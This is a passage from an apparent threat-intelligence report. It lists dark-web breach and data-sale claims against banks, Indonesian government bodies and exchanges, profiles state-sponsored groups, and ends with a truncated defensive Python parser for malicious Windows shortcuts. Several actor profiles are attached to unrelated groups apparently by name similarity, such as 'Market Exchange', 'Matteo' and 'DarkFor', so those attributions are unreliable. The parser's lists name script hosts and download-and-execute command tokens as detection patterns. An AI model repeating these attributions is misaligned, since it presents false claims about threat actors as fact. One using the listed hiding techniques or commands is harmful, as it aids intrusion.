- Screenshot: https://d34iuop8pidsy8.cloudfront.net/96a42cdd-1282-4039-8e49-3391ac7a7508.png
Incident ID: I-37 – Alleged data breach of Kementerian PANRB
- Incident Description: The threat actor, Xsvs_Malaikat, claims to be selling sensitive documents from Indonesia’s Ministry of Administrative and Bureaucratic Reform (PANRB). The post includes personal data of numerous individuals across various regions of Indonesia, such as full names, residential addresses, email addresses, phone numbers, job titles, and associated government departments. Specific details about Xsvs_Malaikat are not available in the provided intelligence.
- Identified Threat Actor(s): Xsvs_Malaikat
- Relevant Links:
- Published URL: https://darkforums.st/Thread-Document-PANRB-DOCUMENT
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/0ffdb9be-9380-4953-a3f4-67f223aa6270.png
Incident ID: I-38 – Alleged database leak of Bank Melli and Bank Mellat
- Incident Description: The threat actor, APT IRAN, claims to have leaked databases from Bank Melli and Bank Mellat. The leaked data reportedly includes sensitive personal and financial information such as national ID numbers, account numbers, full names, card numbers, birth dates, phone numbers, and addresses. Bank Melli Iran is a commercial bank founded in 1969.41 APT IRAN aligns with Iranian Advanced Persistent Threat (APT) groups, which are state-sponsored actors motivated by intelligence collection, disruption, and influence operations.10 These groups often use spearphishing and exploit known vulnerabilities for initial access, and deploy custom malware.10
- Identified Threat Actor(s): APT IRAN
- Relevant Links:
- Published URL: https://t.me/APTIRAN/131
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/42f0d8da-48bc-46d9-a6fc-e71a0aded6b6.png
Incident ID: I-39 – Alleged Data breach of E-Office Dukcapil
- Incident Description: The threat actor, JakartaCyberPsychos_s, claims to have leaked population data from the E-Office Dukcapil system in Enrekang Regency, Indonesia. Dukcapil Enrekang provides an online application for population document management, currently available for operators in sub-districts, villages, and towns, with public access directed to local offices.42 JakartaCyberPsychos_s falls under the general category of “Cybercriminals,” who are primarily motivated by financial gain and often use mass phishing campaigns to deliver malware payloads.45
- Identified Threat Actor(s): JakartaCyberPsychos_s
- Relevant Links:
- Published URL: https://darkforums.st/Thread-LEAKED-EOFFICE-DUKCAPIL-2025-NEWW
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/3921fff2-a8c3-4f43-85e0-d17313084e21.jpg
Incident ID: I-40 – Alleged data breach of Spotify
- Incident Description: A threat actor, abc, is claiming to sell data allegedly obtained from Spotify, consisting of a dump of 50,000 email and password combinations. Spotify is a Swedish audio streaming and media service provider founded in 2006, with over 678 million monthly active users.46 Specific details about abc are not available in the provided intelligence.
- Identified Threat Actor(s): abc
- Relevant Links:
- Published URL: https://kittyforums.to/thread/217
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/5458618f-a28a-401e-b55d-184e2db7083b.png
Incident ID: I-41 – Alleged data breach of Bybit from Malaysia
- Incident Description: A threat actor, Market Exchange, claims to be selling a database allegedly obtained from Bybit, which reportedly includes data from a Malaysian digital coin investment platform. The compromised dataset is said to contain sensitive information on approximately 100,000 individuals, including first names, last names, gender, account balances, and other investment-related details. Bybit is a cryptocurrency exchange established in March 2018, specializing in trading derivatives and spot trading.48 Market Exchange refers to unidentified threat actors targeting publicly exposed Microsoft Exchange servers to inject malicious JavaScript keylogger code into OWA login pages for credential harvesting.2
- Identified Threat Actor(s): Market Exchange
- Relevant Links:
- Published URL: http://mxxxxxxxsjznlccmh5p64nambxuoklg44kmjscl2nkvgoolnzeiqbmqd.onion/pc/goods_view.php?parameter=ab4d_Tews95GeNROU7U0Knoong9LNoneRXOWsCX2FegWgQ1fhhe0zy_YyzKrlEr5wBnC-0AJlwmyHrRCIhRYW1loM9cc89GUZKpFvpvDX73LaBEGNTZjXUhnz1rYfhhx2KJQTU-BResA_Co5OwHlBU8z9jPmN_OyCpovd4ZK-t03INN7jkbiTl330pjduZwIOaBjh93PmhqFTMA8YXhzltc
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/f0352bcc-1682-4a06-b20f-c8298e035fd0.png
Incident ID: I-42 – Alleged Data Leak of MJQ Education Recruitment Portal
- Incident Description: The threat actor, sideline_TH, claims to have leaked data from Mengly J. Quach Education, a Cambodian education recruitment platform. Mengly J. Quach Education Plc. (MJQE) is a leading educational provider in Cambodia, founded in 2005, offering programs from Pre-Kindergarten to university research.49 Specific details about sideline_TH are not available in the provided intelligence.
- Identified Threat Actor(s): sideline_TH
- Relevant Links:
- Published URL: https://darkforums.st/Thread-LEAK-Cambodia-recruitment-mjqeducation-edu-kh
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/a29b33a8-8e15-4e14-9b18-1bdcd870d899.jpg
Incident ID: I-43 – Alleged data leak of customers from Indian fiber optic networks
- Incident Description: The threat actor, Market Exchange, claims to be selling data of 160,000 customers from Indian fiber optic networks, reportedly targeting individuals from major cities with upper-tier asset profiles. Market Exchange refers to unidentified threat actors targeting publicly exposed Microsoft Exchange servers to inject malicious JavaScript keylogger code into OWA login pages for credential harvesting.2
- Identified Threat Actor(s): Market Exchange
- Relevant Links:
- Published URL: http://mxxxxxxxsjznlccmh5p64nambxuoklg44kmjscl2nkvgoolnzeiqbmqd.onion/pc/goods_view.php?parameter=8180OwBS0g7tcJ0CcarGgvmvhWyjAS02BgRHkrLng73hbTlhhNmZ3bOrMijU61mLPCcGzULhk4XvTFI3fdy32dGDSrqyKYKjd-ZQTxg6prEd6mo7_-EujW56RpimhamSNGOsO1TEQhr4XkeIP5jXX4hK-O2je-pLkLA4b1jLEcwe3h55_ad6AafFXbbx5ZbZL48gxJI3MgD-eNS_YfIPnQs
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/5abc76b0-ceb7-40d7-95d5-783f0a669081.png
Incident ID: I-44 – Alleged data breach of Upstox
- Incident Description: The threat actor, chuu, claims to have breached the data of Upstox. The compromised data includes name, address, email, number, and other fields. Upstox is an online investment brand of RKSV Securities, providing stock trading, commodity trading, currency derivatives trading, mutual funds, and Demat accounts in India.50 Specific details about chuu are not available in the provided intelligence.
- Identified Threat Actor(s): chuu
- Relevant Links:
- Published URL: https://darkforums.st/Thread-Document-Database-Of-Upstox-com
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/852f5332-8c5a-44d8-a476-e9edad15a855.png
Incident ID: I-45 – Alleged leak of database containing personal information from Indian passport holders
- Incident Description: The threat actor, Market Exchange, claims to be selling a database allegedly containing personal information from 70,000 high-net-worth Indian passport holders. Market Exchange refers to unidentified threat actors targeting publicly exposed Microsoft Exchange servers to inject malicious JavaScript keylogger code into OWA login pages for credential harvesting.2
- Identified Threat Actor(s): Market Exchange
- Relevant Links:
- Published URL: http://mxxxxxxxsjznlccmh5p64nambxuoklg44kmjscl2nkvgoolnzeiqbmqd.onion/pc/goods_view.php?parameter=3fa03Gn5MEkqlNaRMcDtLXR379KDGJ1qR_a08t1Nfe8Jr7PIDHL3i4o9Eptw9FirA7b25P0240_z3JL9ll8sVgNxkdTY5PeAZyIMjhS_u0sN4oDJNyouYgbKFE3Q90k1pSpTwxhdNEa51l0mdtnr_34AyTGMsG6BxMm6YVRbJPBVhU_41gGde45J0Do5rQ8_PGSaIUBQvIXsg0m8kLmiL3w
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/f747919e-4a50-4c70-b547-7c8506d79746.png
Incident ID: I-46 – Alleged Sale of NTLMv2 Hash Leak via COM + Auto-Execution
- Incident Description: The threat actor, xrahitel, claims to be selling a method to leak NTLMv2 hashes by abusing COM objects combined with auto-execution techniques. While effective, this approach requires initial access—such as tricking a user into running a payload—so it is not a zero-click exploit and does not qualify for a CVE. Once executed, the method silently forces authentication to an attacker-controlled server, leaking NTLMv2 hashes without further user interaction. Specific details about xrahitel are not available in the provided intelligence.
- Identified Threat Actor(s): xrahitel
- Relevant Links:
- Published URL: https://ramp4u.io/threads/ntlmv2-hash-leak-via-com-auto-execution.3227/
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/8f67664c-37ba-47e7-942f-fb7b71b6403c.png
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/c4098363-c999-456c-aacd-f09d7198dce9.png
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/9f99fdc3-6ff4-46f6-963f-b5c760736197.png
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/7854d035-e54c-426e-bb13-45031d90e763.png
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/f4ea30cb-4b2b-453a-890c-e644d01693a5.png
Incident ID: I-47 – Alleged data breach of Kleinanzeigen
- Incident Description: A threat actor, magically, is claiming to sell a database allegedly linked to Kleinanzeigen, offering access to private logs, session cookies, email data, and user accounts with original email credentials and 2FA bypassed access. Kleinanzeigen is a German online listing platform for buying and selling multi-category secondhand products, founded in 2009.52 Specific details about magically are not available in the provided intelligence.
- Identified Threat Actor(s): magically
- Relevant Links:
- Published URL: https://forum.exploit.in/topic/261385/
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/c3114ead-01b6-4945-9b9c-12365c872614.png
Incident ID: I-48 – Alleged database sale of telegram chats
- Incident Description: The threat actor, Matteo, claims to be selling a large database of over 50,000 Telegram chats. The data is categorized by topics and includes communities related to shadow discussions, drugs, cryptocurrency trading and equipment, car sales, carding, poker, astrology, and more. Several of these databases have participant counts ranging from tens of thousands to over 700,000 users. The database also includes region-specific groups such as those from the CIS and Russia. Matteo is associated with the Tsunami-Framework, a malware framework that relies on the TOR-Network and Pastebin for command and control communications, and is linked to North Korea.5
- Identified Threat Actor(s): Matteo
- Relevant Links:
- Published URL: https://xss.is/threads/140537/
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/e5ca03b8-5a88-44ed-b67f-962626ea930b.png
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/f390a6aa-8901-4fa3-bde2-8d9451ce1d5f.png
Incident ID: I-49 – Alleged data breach of Bank of Baroda
- Incident Description: The threat actor, Market Exchange, claims to be selling data belonging to 50,000 customers of Bank of Baroda, India. Market Exchange refers to unidentified threat actors targeting publicly exposed Microsoft Exchange servers to inject malicious JavaScript keylogger code into OWA login pages for credential harvesting.2
- Identified Threat Actor(s): Market Exchange
- Relevant Links:
- Published URL: http://mxxxxxxxsjznlccmh5p64nambxuoklg44kmjscl2nkvgoolnzeiqbmqd.onion/pc/goods_view.php?parameter=e4d7xCneV6EmbLLFXHIxrnR9GtzZj3adcRSGyY8ep6Y7i7YI8AZshYDOkYqqcQXqL9_9EYOQgq-2eSzYObJAnj2ITGjLugASHulE-nE4lQ6h1cJ7EKFPu5C05_RS1YS7fdZDcVd4HmXtajB74yZeiaPb3LAyQktpdjO5GIJw4QD9fe6rJIbmC0Hx5BDgyT8fPtM_GvhGA2YEV6lXHlah4Dc
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/dbdbeaf4-6e48-415c-98e6-b4e43a8d8b15.png
Incident ID: I-50 – Alleged data breach of Bybit
- Incident Description: The threat actor, MindReader9, claims to have breached Bybit and to hold 10k records. The compromised data consists of dehashed samples. Bybit is a prominent cryptocurrency exchange established in March 2018, specializing in trading derivatives.48 Specific details about MindReader9 are not available in the provided intelligence.
- Identified Threat Actor(s): MindReader9
- Relevant Links:
- Published URL: https://darkforums.st/Thread-Bybit-10k-Dehashed-Sample-zip
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/cda97eb5-08f5-4214-bbd7-c668d91ca1b6.png
Incident ID: I-51 – Alleged Data Leak of Korean E-Commerce Platform
- Incident Description: The threat actor, BezzzDelnick, claims to have leaked data from a Korean e-commerce site, including 648K dehashed records and MD5 hashes. Specific details about BezzzDelnick are not available in the provided intelligence.
- Identified Threat Actor(s): BezzzDelnick
- Relevant Links:
- Published URL: https://xss.is/threads/140536/
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/a5c84980-586f-42cb-9f88-c6bcaa96f8a4.jpg
Incident ID: I-52 – Alleged data breach of Fling.com
- Incident Description: A threat actor, Matteo, is claiming to be distributing a leaked database from Fling.com, an adult dating platform, allegedly exposing data on approximately 40 million users in a 13.7 GB file. Fling was a social media app founded in 2014, which allowed users to send pictures to random people worldwide, but was later taken offline due to issues with sexually explicit content and funding.53 Matteo is associated with the Tsunami-Framework, a malware framework that relies on the TOR-Network and Pastebin for command and control communications, and is linked to North Korea.5
- Identified Threat Actor(s): Matteo
- Relevant Links:
- Published URL: https://xss.is/threads/140531/
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/f164808e-b9f2-4e03-afaa-a063ad425dd7.png
Incident ID: I-53 – Alleged data leak of Constitutional Court of Indonesia
- Incident Description: The threat actor, Xsvs_Malaikat, claims to have leaked personal data of Indonesian citizens from the Constitutional Court, including names, ID numbers, birthdates, phone numbers, and addresses. The Constitutional Court of the Republic of Indonesia is one of the two national apex courts in Indonesia, established in 2003, with powers including reviewing the constitutionality of Acts and resolving electoral disputes.54 Specific details about Xsvs_Malaikat are not available in the provided intelligence.
- Identified Threat Actor(s): Xsvs_Malaikat
- Relevant Links:
- Published URL: https://darkforums.st/Thread-MAHKAMAH-KONSTITUSI-DATABASE
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/a4c39612-e083-490c-835d-f6f2c261bdb5.jpg
Incident ID: I-54 – Alleged data breach of Dubsmash
- Incident Description: The threat actor, Matteo, claims to be selling a database leak of Dubsmash.com, including over 12 million dehashed passwords. The compromised data includes email addresses, usernames, names, phone numbers, passwords, geographic locations, and spoken languages. The full leak is sized at 144.59 MB. Dubsmash is an application designed for recording and sharing short lip-sync videos, founded in 2014.55 Matteo is associated with the Tsunami-Framework, a malware framework that relies on the TOR-Network and Pastebin for command and control communications, and is linked to North Korea.5
- Identified Threat Actor(s): Matteo
- Relevant Links:
- Published URL: https://xss.is/threads/140535/
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/2dbdc8d8-fd30-442f-accc-a2abdc7bcbcf.png
Incident ID: I-55 – WOLF CYBER ARMY targets the website of IAIN Syekh Nurjati Cirebon
- Incident Description: The threat actor, WOLF CYBER ARMY, claims to have defaced the website of IAIN Syekh Nurjati Cirebon. UIN Siber Syekh Nurjati Cirebon aims to be a frontier for the Open Islamic Educational Resources (OIER) movement globally, focusing on digital and networked education.56 Specific details about WOLF CYBER ARMY are not available in the provided intelligence.
- Identified Threat Actor(s): WOLF CYBER ARMY
- Relevant Links:
- Published URL: https://t.me/c/2678983526/182
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/c63a9d99-48e8-4774-a3df-080c5790994b.jpg
Incident ID: I-56 – Alleged data breach of JAWA TENGAH
- Incident Description: A threat actor, Xsvs_Malaikat, claims to have leaked data from Indonesia’s 2015 PBDT survey, exposing national ID numbers, names, addresses, land details, and intervention records. JAWA TENGAH refers to the province of Central Java, Indonesia, which is divided into 29 regencies and six cities.59 Specific details about Xsvs_Malaikat are not available in the provided intelligence.
- Identified Threat Actor(s): Xsvs_Malaikat
- Relevant Links:
- Published URL: https://darkforums.st/Thread-JAWA-TENGAH-DATABASE
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/c73120cd-5483-4ce7-9288-abbaeb49493c.png
Incident ID: I-57 – Alleged sale of unauthorized access to Kraken
- Incident Description: The threat actor, DarkFor, claims to be selling unauthorized access to Kraken. This access allegedly allows lookups by email or phone number and provides detailed information on Kraken users, including full name, country, address, ID verification status, join date, contact details, last login, two-factor authentication method, and current cryptocurrency balances. Kraken is a global cryptocurrency exchange founded in 2011, offering spot and futures trading.60 Specific details about DarkFor are not available in the provided intelligence, though DragonForce is a ransomware group that evolved into a “ransomware cartel”.7
- Identified Threat Actor(s): DarkFor
- Relevant Links:
- Published URL: https://darkforums.st/Thread-Selling-We-are-selling-an-access-for-the-Kraken-Intranet
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/11cc7338-65d8-487c-85a3-c621b79464f7.png
Incident ID: I-58 – WOLF CYBER ARMY targets the website of Explore Redwoods
- Incident Description: The threat actor, WOLF CYBER ARMY, claims to have defaced the website of Pengadilan Agama Krui. The title of the incident, however, refers to “Explore Redwoods.” Pengadilan Agama Krui is a religious court in Indonesia.61 Explore Redwoods (Redwood Software) is a company dedicated to “lights-out automation” for mission-critical business processes, with offices globally.63 Specific details about WOLF CYBER ARMY are not available in the provided intelligence.
- Identified Threat Actor(s): WOLF CYBER ARMY
- Relevant Links:
- Published URL: https://t.me/c/2678983526/186
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/1f5399f9-8682-4ffe-b21d-c85590d5546f.jpg
Incident ID: I-60 – Alleged data breach of Kalad
- Incident Description: The threat actor, ZeroDayX, claims to have breached Kalad.com.sa, a Saudi Arabian mining and logistics company. The attacker claims to have exploited a zero-day vulnerability to breach and deface the website, exfiltrating the full database. The leaked data reportedly includes client records, internal emails, employee credentials, and contract files. Kalad (KDL Logistics) is a total logistics service provider in Saudi Arabia with over 40 years of experience.64 Specific details about ZeroDayX are not available in the provided intelligence.
- Identified Threat Actor(s): ZeroDayX
- Relevant Links:
- Published URL: https://darkforums.st/Thread-Kalad-com-sa-Hacked-Full-Database-Dump-Available-%F0%9F%9A%A8
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/5bb6b9e3-d00e-40f0-b898-0cfcb0fc9bb9.png
IV. Threat Actor Deep Dive
This section provides a detailed analysis of the unique threat actors identified in the reported incidents, drawing upon extensive threat intelligence to provide context on their origins, motivations, and operational methodologies.
A. State-Sponsored Threat Actors
1. Leviathan (China)
Leviathan, also recognized by numerous aliases such as APT40, Kryptonite Panda, TEMP.Periscope, and Gingham Typhoon, is a Chinese state-sponsored cyberespionage group that has been active since at least 2009.3 Their primary motivation is cyberespionage, focusing on intelligence gathering that aligns with China’s strategic interests.3
The group’s targeting profile is remarkably broad, encompassing a wide array of nations and critical sectors. Geographically, they have targeted entities in Belgium, Cambodia, Germany, Hong Kong, Indonesia, Laos, Malaysia, Myanmar, New Zealand, Norway, the Philippines, Saudi Arabia, Switzerland, Thailand, the UK, the USA, Vietnam, and the Asia Pacific Economic Cooperation (APEC) region.3 Their sectoral focus includes Aerospace & Defense, Education, Government & Law Enforcement Agencies (LEA), Manufacturing, Technology, and Transportation & Logistics.3 This diverse targeting underscores their role in comprehensive intelligence collection across various strategic domains.
Leviathan’s operational methodologies are characterized by agility and sophistication. For initial access, they frequently employ spearphishing emails containing malicious attachments, often JavaScript, designed to deploy malware like Cobalt Strike.3 They also use links, such as those pointing to Google Drive, to trick targets into downloading and executing harmful content.3 A notable characteristic is their rapid weaponization of newly disclosed vulnerabilities, often exploiting them within days of public disclosure. This includes critical vulnerabilities like CVE-2021-44228 (Log4j), CVE-2021-31207 (Atlassian Confluence), and various Microsoft Exchange CVEs.3 This swift action leaves organizations a minimal window to patch before active exploitation begins, placing immense pressure on vulnerability management programs.
Once a foothold is established, Leviathan employs a diverse array of malware and tools, including both custom-developed backdoors like AIRBREAK and BADFLICK, and publicly available tools such as Cobalt Strike, China Chopper, and Gh0st RAT.3 They often deploy executables with code-signing certificates to evade detection, adding a layer of legitimacy to their malicious activities.3 Persistence is maintained through the extensive use of backdoors and web shells, ensuring continued access to compromised systems.3
For privilege escalation and credential access, Leviathan specifically targets VPN and remote desktop credentials. They leverage custom tools like HOMEFRY, a password dumper and cracker, alongside legitimate tools like Windows Sysinternals ProcDump and Windows Credential Editor (WCE), to escalate privileges and extract password hashes.3 Their defense evasion techniques are highly sophisticated, including steganography to hide data within other files stored on platforms like GitHub, and protocol impersonation, where they use Dropbox API keys to upload stolen data, mimicking legitimate service usage.3 They also employ protocol tunneling, multi-hop proxies like Tor, and domain typosquatting for their C2 infrastructure, all designed to obscure their tracks and blend malicious traffic with legitimate network activity.3 This deliberate blending makes traditional network traffic analysis significantly harder, as C2 can be hidden within normal business communications.
For discovery and lateral movement, Leviathan utilizes Server Message Block (SMB)/Windows Admin Shares and network share directories for reconnaissance and internal movement.3 Cobalt Strike’s ‘Beacon’ agent is a key tool for command execution and lateral movement within compromised networks.3 Data exfiltration involves archiving, encrypting, and staging collected data locally and remotely, often exfiltrating it over the C2 channel. Tools like LUNCHMONEY are specifically used for exfiltration to Dropbox.3 The broad set of tools and techniques, combined with their focus on rapid exploitation and stealthy operations, positions Leviathan as a highly adaptive and persistent threat.
2. Iranian APT Groups (General Overview)
Iranian Advanced Persistent Threat (APT) groups represent a collective of state-sponsored actors, including well-known entities such as APT33 (Elfin, Magnallium), OilRig (APT34, Helix Kitten, Chrysene), Magic Hound (APT35, Charming Kitten), APT42, and MuddyWater (Seedworm, Static Kitten).8 These groups are backed by or affiliated with various Iranian intelligence and military organizations, and their operations are closely aligned with Iran’s strategic objectives.10
Their motivations extend beyond traditional espionage to include long-term intelligence collection, disruption of critical services, and influence operations, often serving as a means of retaliation for perceived threats or sanctions.8 A key aspect of their doctrine is to instill fear and signal strength while deliberately operating below the threshold that would warrant a full-scale military response.8 This approach contributes to a complex form of hybrid warfare.
The targeting profile of Iranian APTs is diverse and strategically chosen. They have repeatedly targeted U.S. aerospace firms, financial institutions, healthcare systems, government agencies, and critical infrastructure, including water and power utilities.8 Beyond Western entities, they also focus on Western think tanks, academic institutions, dissident communities, telecommunications, energy, and media sectors, particularly in the Middle East and South Asia.10 This broad targeting reflects their comprehensive intelligence and disruptive objectives.
In terms of tactics, techniques, and procedures (TTPs), Iranian APTs heavily rely on spearphishing campaigns for initial access. These campaigns often involve fake login pages, password reset lures, and impersonation tactics designed to trick victims into disclosing credentials.10 They are also known for exploiting publicly known vulnerabilities, such as CVE-2021-40444, and engaging in supply chain infiltration to gain initial footholds.8
For execution and persistence, these groups deploy a mix of custom malware, including DropShot, TurnedUp, PowGoop, and Thanos ransomware variants, alongside commercial remote access tools like Remote Utilities.10 They frequently leverage legitimate administrative tools such as PowerShell, Remote Desktop Protocol (RDP), and screen capture utilities to maintain access to compromised systems.10 A significant aspect of their strategy involves infiltrating networks and lying dormant for extended periods, sometimes months or even years, collecting data and mapping systems before initiating their primary objectives.8
Defense evasion is a core component of their operations. They utilize polymorphic code, fileless techniques, proxies, disinformation, and false flags to sow confusion and delay attribution.8 Their operations often blend traditional espionage with techniques designed to obscure their identity, such as using faux hacktivist personas.10 This strategic ambiguity in Iranian cyber warfare makes it incredibly challenging for nations to formulate clear deterrence policies and respond proportionately, as direct attribution is difficult and the intent is often to create instability rather than direct destruction. This necessitates robust forensic capabilities and enhanced cross-sector intelligence sharing to overcome attribution ambiguity.
The impact of their operations can range from data theft and espionage to highly destructive wiper attacks, such as those using Apostle and Deadwood malware, and ransomware disguised as hacktivism.10 They also engage in data leaks and Distributed Denial of Service (DDoS) attacks.10 The evolution of Iran’s cyber capabilities, particularly after the 2010 Stuxnet attack, demonstrates how a perceived national security threat can spur a nation to significantly enhance its offensive cyber capabilities, leading to an increasingly complex global threat landscape.10
3. Fancy Bear (APT28, Russia)
Fancy Bear, also widely tracked as APT28, Sofacy, Pawn Storm, Sednit, STRONTIUM, Tsar Team, and Threat Group-4127, is a prominent Russian state-sponsored threat actor [11]. Its operations are driven by state-sponsored espionage, intelligence gathering, and political influence, aligned with Russia's geopolitical objectives.
The group primarily targets government entities and defense companies across several regions, including Africa, the European Union, and South America [11]. This targeting reflects its focus on acquiring sensitive information and influencing political landscapes.
Fancy Bear's TTPs for initial access rely heavily on spearphishing emails. These emails often carry malicious attachments or links to spoofed websites, using social engineering to trick victims into compromising themselves [11]. A key method is the exploitation of cross-site scripting (XSS) vulnerabilities in webmail interfaces, as demonstrated by its exploitation of CVE-2024-11182 in MDaemon [11]. The injected JavaScript runs as soon as the victim views the crafted message in the webmail client: no attachment has to be opened and no credentials have to be typed, and the script executes inside the victim's authenticated session, so it can read mail and contacts with the victim's own permissions. The enduring vulnerability of webmail platforms and the effectiveness of social engineering remain critical points of failure that Fancy Bear consistently exploits; despite technical advances, the human element and common web-application weaknesses are still highly effective attack vectors. Patching the webmail server and rendering HTML mail under a strict Content Security Policy are the direct mitigations.
Upon successful exploitation, the group delivers SpyPress, a malicious JavaScript payload designed to exfiltrate sensitive email data from the compromised webmail interface [11]. This direct path from exploitation to data exfiltration shows how efficiently the group achieves its intelligence objectives once access is gained.
4. puNK-003 (North Korea)
puNK-003 is identified as a North Korean advanced persistent threat (APT) group [12]. Its specific motivations are not detailed in the available information, but the characteristics of North Korean APTs generally suggest state-sponsored espionage or financial gain in support of the regime.
The group's targeting profile is not extensively described, but its reliance on targeted phishing implies a focus on specific, high-value entities or individuals [12].
A distinctive aspect of puNK-003's initial-access TTPs is the delivery of malware through targeted phishing that uses malicious LNK (Windows shortcut) files [12]. Together with the group's use of AutoIt-compiled tooling (a choice also seen in the DarkGate loader), this fits a trend in which threat actors lean on less-scrutinized file types and scripting languages to bypass traditional controls: a shortcut that launches cmd.exe or PowerShell with a long argument string (commonly padded with whitespace so the payload is pushed out of the Properties dialog) can evade detection tuned for executables and macro-enabled documents. Organizations should analyze file behavior regardless of extension, block or quarantine LNK files arriving by mail or inside archives, and use application control to prevent unauthorized script execution.
Once initial access is achieved, puNK-003 deploys two main malware families: Lilith RAT, a remote access trojan written in C++, and CURKON, an AutoIt variant of Lilith RAT that functions as a downloader [12]. Analysis indicates that puNK-003 shares similarities with the KONNI group, particularly in its use of AutoIt scripts and specific coding functions [12]. Reported indicators of infection include unusual network activity and system slowdowns [12]; these are generic, and the shortcut's own metadata (target, arguments, window state, icon) gives defenders a more specific artifact to hunt on.
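The following is an added example, not code from the original report or from any vendor cited here: a Python parser for the Shell Link (.lnk) format that pulls out the fields a phishing shortcut abuses (target, arguments, window state, icon) and scores them. The sample shortcut bytes are constructed inside the script; the heuristics, the script-host list, and the 198.51.100.5 address are assumptions for the example, not indicators from the puNK-003 reporting.

```python
"""Parse Windows Shell Link (.lnk) files and flag shortcuts that behave like
phishing droppers: script-host targets, hidden windows, padded or encoded
arguments, decoy icons. Pure Python, runs offline. The sample shortcuts at the
bottom are constructed here for testing, not taken from any campaign."""
import base64
import struct
import sys

# LinkFlags bits (MS-SHLLINK 2.1.1) and the ShowCommand value that hides the window.
HAS_TARGET_IDLIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
SW_SHOWMINNOACTIVE = 7
HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# Assumed heuristics: binaries a document-looking shortcut has no business launching,
# and argument fragments typical of download-and-execute one-liners.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "msiexec.exe",
                "forfiles.exe", "conhost.exe"}
ARG_TOKENS = ("-enc", "-encodedcommand", "frombase64string", "downloadstring", "iex ",
              "invoke-expression", "http://", "https://", "-w hidden", "-windowstyle hidden",
              "bypass")
DECOY_ICONS = ("shell32.dll", "imageres.dll", "wordicon", "excel", "acrobat", "notepad")


def _read_string(buf, off, unicode):
    """StringData item: CountCharacters (uint16) followed by the characters."""
    n = struct.unpack_from("<H", buf, off)[0]
    off += 2
    if unicode:
        return buf[off:off + 2 * n].decode("utf-16-le"), off + 2 * n
    return buf[off:off + n].decode("cp1252", "replace"), off + n


def parse_lnk(buf):
    """Return the fields an analyst cares about from the raw bytes of a .lnk file."""
    if (len(buf) < HEADER_SIZE or struct.unpack_from("<I", buf, 0)[0] != HEADER_SIZE
            or buf[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", buf, 0x14)[0]
    show_cmd = struct.unpack_from("<I", buf, 0x3C)[0]
    off = HEADER_SIZE
    if flags & HAS_TARGET_IDLIST:          # skip LinkTargetIDList (IDListSize + IDList)
        off += 2 + struct.unpack_from("<H", buf, off)[0]
    if flags & HAS_LINK_INFO:              # skip LinkInfo (self-sized structure)
        off += struct.unpack_from("<I", buf, off)[0]
    uni = bool(flags & IS_UNICODE)
    fields = {"show_command": show_cmd}
    for bit, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if flags & bit:                    # StringData items appear in exactly this order
            fields[name], off = _read_string(buf, off, uni)
    return fields


def assess(lnk):
    """Heuristics: list of reasons the shortcut looks like a dropper (empty means clean)."""
    reasons = []
    target = lnk.get("relative_path", "").lower().replace("/", "\\").rsplit("\\", 1)[-1]
    args = lnk.get("arguments", "")
    if target in SCRIPT_HOSTS:
        reasons.append(f"target is a script/LOLBin host: {target}")
    if lnk["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("ShowCommand=SW_SHOWMINNOACTIVE (window hidden from the user)")
    if len(args) > 260:
        reasons.append(f"arguments unusually long ({len(args)} chars)")
    if len(args) - len(args.lstrip()) > 32:
        reasons.append("arguments padded with leading whitespace (payload hidden off-screen)")
    low = args.lower()
    reasons += [f"suspicious argument token: {t.strip()}" for t in ARG_TOKENS if t in low]
    icon = lnk.get("icon_location", "").lower()
    if target in SCRIPT_HOSTS and any(d in icon for d in DECOY_ICONS):
        reasons.append(f"decoy document icon on a script-host shortcut: {icon}")
    return reasons


def build_lnk(relative_path, arguments, working_dir=".", show_command=1, icon=None):
    """Build a minimal Unicode .lnk (constructed test data; no IDList/LinkInfo sections)."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS
    flags |= HAS_ICON_LOCATION if icon else 0
    hdr = struct.pack("<I", HEADER_SIZE) + LNK_CLSID
    # LinkFlags, FileAttributes, three FILETIMEs, FileSize, IconIndex, ShowCommand
    hdr += struct.pack("<IIQQQIII", flags, 0x20, 0, 0, 0, 0, 0, show_command)
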